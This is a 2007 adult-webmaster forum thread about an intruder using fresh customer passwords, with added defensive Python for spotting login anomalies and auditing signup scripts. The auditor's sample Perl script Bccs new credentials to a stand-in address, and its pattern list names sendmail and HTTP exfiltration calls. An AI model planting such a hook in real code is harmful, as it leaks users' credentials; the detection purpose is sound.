GoFuckYourself.com - Adult Webmaster Forum

adonis 10-10-2007 11:22 PM

Someone steals our customer passwords regularly
 
I noticed someone is accessing our site using our customers' passwords. He's using the same IP address (at least I know one of his IP addresses). He's using only selected passwords of the last day (He generally doesn't use older passwords). He sometimes shares a password with a few others.

I think he's not using brute force attack, because we log failed logins, nothing weird there...

He can access customers' mails (at least one of them), because I changed a password and emailed the customer, 5 minutes later he tried the new password.

If some password is used by a few different IP numbers in a day, it is suspended temporarily with a warning message. He sees the message and continuously tries to enter for hours. He has other passwords but he insists on the latest one he has.

This is very weird. Does someone have any logical idea?

Martin3 10-10-2007 11:30 PM

You sure it's not just the ip(s) of some web cache servers like AOL or some other big ISP?

DatingGold 10-10-2007 11:33 PM

these are the kinds of things you don't post on boards lol

RawAlex 10-10-2007 11:35 PM

Sounds like a torrent site ripper bot with a nice backdoor into a few people's PCs.

You might want to watch those signups and see if they have an affiliate in common, and also see how long before they cancel / chargeback / card reported stolen.

minusonebit 10-10-2007 11:36 PM

Yeah, it sounds like you have been hacked.

adonis 10-11-2007 12:04 AM

Quote:

Originally Posted by RawAlex (Post 13219151)
Sounds like a torrent site ripper bot with a nice backdoor into a few people's PCs.

You might want to watch those signups and see if they have an affiliate in common, and also see how long before they cancel / chargeback / card reported stolen.

What is torrent site ripper? I scanned my computer with Kaspersky, Ad-Aware and Spybot. Nothing found... They don't have a common affiliate.

d-null 10-11-2007 12:09 AM

Quote:

Originally Posted by Martin3 (Post 13219127)
You sure it's not just the ip(s) of some web cache servers like AOL or some other big ISP?

what he said... this even happens with some more localized isps

WiredGuy 10-11-2007 12:10 AM

You sure it's not specific clients sharing the passwords? Are you putting any kind of password strength to make sure they're not simple passwords?
WG

After Shock Media 10-11-2007 12:26 AM

Do you have something such as strongboxxx protecting your members area?
Are you using totally random user/pass or letting people choose their own?
You aware one IP may be a proxy and it could be an entire forum using it?

wateva 10-11-2007 01:02 AM

the ip most probs will be a proxy............

adonis 10-11-2007 01:28 AM

Quote:

Originally Posted by After Shock Media (Post 13219361)
Do you have something such as strongboxxx protecting your members area?
Are you using totally random user/pass or letting people choose their own?
You aware one IP may be a proxy and it could be an entire forum using it?

Even if it's a proxy, one person is using it, and he gives away passwords to one or two people, or a limited group. I know he's one person using the proxy, because the cookies and browser info in the HTTP headers are the same...

Our visitors choose their passwords, but this guy doesn't enter a wrong password. He starts using it 15 minutes, or several hours after signup.

If you had access to the whole member database, wouldn't you try another username if the one you try is suspended because of multiple access?? Yes you would, but this guy doesn't try other ones, only the latest. This is weird. I think he can see new login pairs,

MikeSmoke 10-11-2007 02:42 AM

Don't know if you use pennywize, but i was stumped with a similar problem until I dumped them and went with strongbox......

TeenCat 10-11-2007 03:11 AM

hello man. are you receiving emails when new member arrived? if yes, go and change your email password now! what payment system do you use? it depends on it cause there are at least two payment system completely hacked so if you are on one of them it is the reason. so, change password to your email, change password to access your payment system account, change path to your .htpasswd and to your log and database files and if it will not help, change billing system ;) if this will not help, go and hire some security expert who will help you in few moments ;) best wishes with your sites!

hjnet 10-11-2007 04:12 AM

Quote:

Originally Posted by adonis (Post 13219108)
He sees the message and continuously tries to enter for hours.

Sounds like a bot to me, or a really really horny dude :1orglaugh

SmokeyTheBear 10-11-2007 04:30 AM

a few things should stand out to help explain what's going on..

#1 a real person doesn't repeatedly try a dead password. this should be a pretty standard indicator this is a bot of some sort or a proxy

#2 if they are getting fresh passes with no common affiliate then there isn't too many holes. it has to be in the email or billing.. if the numbers are less than 10% then it's possible it's something like zango scooping the passes

but i would say there's a good pos your mail server is compromised and they are running the passes thru a proxy
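
Added example (not part of any post in this thread): a sketch of the two checks discussed above, the site's rule of suspending a login used from several IPs in one day, and the pattern adonis describes, where one source IP never fails a login yet opens several accounts shortly after signup. The log layout, thresholds and sample records are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample data (not from the thread), using documentation-range IPs.
SIGNUPS = {  # username -> (signup time, signup IP)
    "alice": ("2007-10-10 09:00", "198.51.100.10"),
    "bob":   ("2007-10-10 11:30", "198.51.100.20"),
    "carol": ("2007-10-10 14:00", "198.51.100.30"),
    "dave":  ("2007-10-01 08:00", "198.51.100.40"),
}
LOGINS = [  # (time, username, source IP, login succeeded)
    ("2007-10-10 09:05", "alice", "198.51.100.10", True),
    ("2007-10-10 09:20", "alice", "203.0.113.7", True),
    ("2007-10-10 11:50", "bob", "203.0.113.7", True),
    ("2007-10-10 12:10", "bob", "198.51.100.20", True),
    ("2007-10-10 15:00", "carol", "203.0.113.7", True),
    ("2007-10-10 16:00", "carol", "203.0.113.8", True),
    ("2007-10-10 17:00", "carol", "203.0.113.9", True),
    ("2007-10-10 18:00", "dave", "198.51.100.40", False),
    ("2007-10-10 18:01", "dave", "198.51.100.40", True),
]

def ts(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M")

def shared_accounts(logins, ip_threshold=3):
    """Accounts used from ip_threshold or more distinct IPs on one calendar day."""
    ips_per_day = defaultdict(set)
    for when, user, ip, ok in logins:
        if ok:
            ips_per_day[(user, ts(when).date())].add(ip)
    return sorted({u for (u, _), ips in ips_per_day.items() if len(ips) >= ip_threshold})

def leak_source_ips(logins, signups, window=timedelta(hours=24), min_accounts=3):
    """IPs with no failed logins that open several accounts soon after signup."""
    fresh, failed = defaultdict(set), set()
    for when, user, ip, ok in logins:
        if not ok:
            failed.add(ip)
            continue
        signed_up, signup_ip = signups[user]
        # Count only logins from an IP other than the one that signed up.
        if ip != signup_ip and ts(when) - ts(signed_up) <= window:
            fresh[ip].add(user)
    return {ip: sorted(users) for ip, users in fresh.items()
            if len(users) >= min_accounts and ip not in failed}
```

An IP returned by `leak_source_ips` points at a leak where credentials are created or delivered (signup script, mail, billing) rather than at guessing, since guessing would leave failed logins.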

SmokeyTheBear 10-11-2007 04:39 AM

is the ip close to this
82.165.140.113

Mickey Mouse 10-11-2007 09:46 AM

I'm far from an expert as I've had a few problems in this area myself, but I'd second the recommendation for YOU to change your password to your email. I might also recommend using Gmail or Hushmail and accessing both via https. Gmail defaults to non https, so you'll have to type in the https to access it via SSL and remain on SSL. These systems will not only encrypt your Username and Password, but also everything you send--but only if accessed via https.

Email is two way, so even if your security is good, there could be an issue on the end of your new user. Similarly, you don't know if they have other security problems--the customer is the person you have no control over.

Your own security is another matter. Take a look at your home security. Make a strong wireless password if accessing via wireless, and consider VPN if using a connection in a hotel as many hotels use hubs not switches--they don't care about your security.

It's also probably time to change your password on your server's control panel as well as all the sites. Make sure your passwords are strong. Need help generating strong passwords? See https://www.grc.com/passwords.htm for a free password generator.

Make sure your password file is not web accessible. Obvious, but you'd be surprised.

Make sure your members' user names and passwords are strong. Probably not happening if your users are selecting their own.

99 times out of 100 if someone gets ahold of someone else's password it's because it was "given" to them. Meaning the customer put it up at some password sharing board. I don't tell my customers that I have password protection scripts, so many don't think I'll catch them. While others will wait until near the end of their membership and then share it. I've given serious thought about hiring a collection agency to go after these customers for the extra bandwidth, but luckily my password protection script always catches this before long and cuts them off.

Also, why not block the IP? Of course he'll just find a way to access from another, but curious why you didn't try anyway.

raymor 10-11-2007 10:04 AM

If they seem to be getting passwords belonging to many different legitimate
users, they are likely ripping your password file. Here is the solution:
http://bettercgi.com/strongbox/passgen/

(See mainly the part about using modern encryption for the password file).

Mickey Mouse 10-11-2007 10:07 AM

Also, very important. Don't use the same passwords for different things. For example, some of these Post Pic for Rating and Traffic sites are simply a trap to find out what User Name and Passwords you like to use. There are certainly many other types of sites out there doing the same. You sign up and then they'll use that user name and password to try to access your site, email, etc. So, make sure to use different passwords for different things.

ladida 10-11-2007 11:29 AM

Quote:

Originally Posted by raymor (Post 13220828)
If they seem to be getting passwords belonging to many different legitimate
users, they are likely ripping your password file. Here is the solution:
http://bettercgi.com/strongbox/passgen/

(See mainly the part about using modern encryption for the password file).

Market your product less and write things that make sense. If they are ripping his password file (you wrote that), then your product is useless in that. Less false marketing, more support.

raymor 10-12-2007 01:17 PM

Quote:

Originally Posted by ladida (Post 13221242)
Market your product less and write things that make sense. If they are ripping his password file (you wrote that), then your product is useless in that. Less false marketing, more support.

Actually the link I posted isn't for our product, it's information and a free tool
to stop password file ripping. Before you tear into someone offering assistance,
it might be good to actually look at the link.

Back to the original topic, a cracker could have modified the processor's add
script to email them the new user names and passwords. Use ctrl-f in Notepad
or your favorite text editor and look for "sendmail".
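
Added example (not from raymor or any product mentioned in the thread): the manual search for "sendmail" in the signup script, extended to also flag other outbound mail or HTTP calls and any recipient address outside an allow-list. The sample Perl script, the pattern list and the allowed domain are constructed assumptions.

```python
import re
from pathlib import Path

# The thread names only "sendmail"; the other patterns are an added generalization.
OUTBOUND_PATTERNS = {
    "sendmail": re.compile(r"sendmail", re.I),
    "mail-call": re.compile(r"\bmail\s*\(|Net::SMTP|MIME::Lite", re.I),
    "http-call": re.compile(r"LWP::UserAgent|curl_exec|fsockopen", re.I),
}
# Perl double-quoted strings escape the at sign, so allow an optional backslash.
EMAIL = re.compile(r"([\w.+-]+)\\?@([\w-]+(?:\.[\w-]+)+)")

# Constructed stand-in for a tampered member-add script.
SAMPLE = r"""#!/usr/bin/perl
open(PW, ">>$pwfile"); print PW "$user:$crypted\n"; close(PW);
open(MAIL, "|/usr/sbin/sendmail -t");
print MAIL "To: $member_email\n";
print MAIL "Bcc: dropbox\@example.net\n";
print MAIL "Login: $user / $pass\n";
"""

def audit_text(text, allowed_domains):
    """Return (line number, label, detail) for each line that needs a human look."""
    findings = []
    for number, line in enumerate(text.splitlines(), 1):
        for label, pattern in OUTBOUND_PATTERNS.items():
            if pattern.search(line):
                findings.append((number, label, line.strip()))
        for local, domain in EMAIL.findall(line):
            if domain.lower() not in allowed_domains:
                findings.append((number, "unknown-recipient", f"{local}@{domain}"))
    return findings

def audit_script(path, allowed_domains):
    """Same check for a script on disk; unreadable bytes are replaced, not fatal."""
    return audit_text(Path(path).read_text(errors="replace"), allowed_domains)

if __name__ == "__main__":
    for finding in audit_text(SAMPLE, {"example.com"}):
        print(finding)
```

Comparing the script against a known-good copy from the processor catches changes that no pattern list will.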


All times are GMT -7.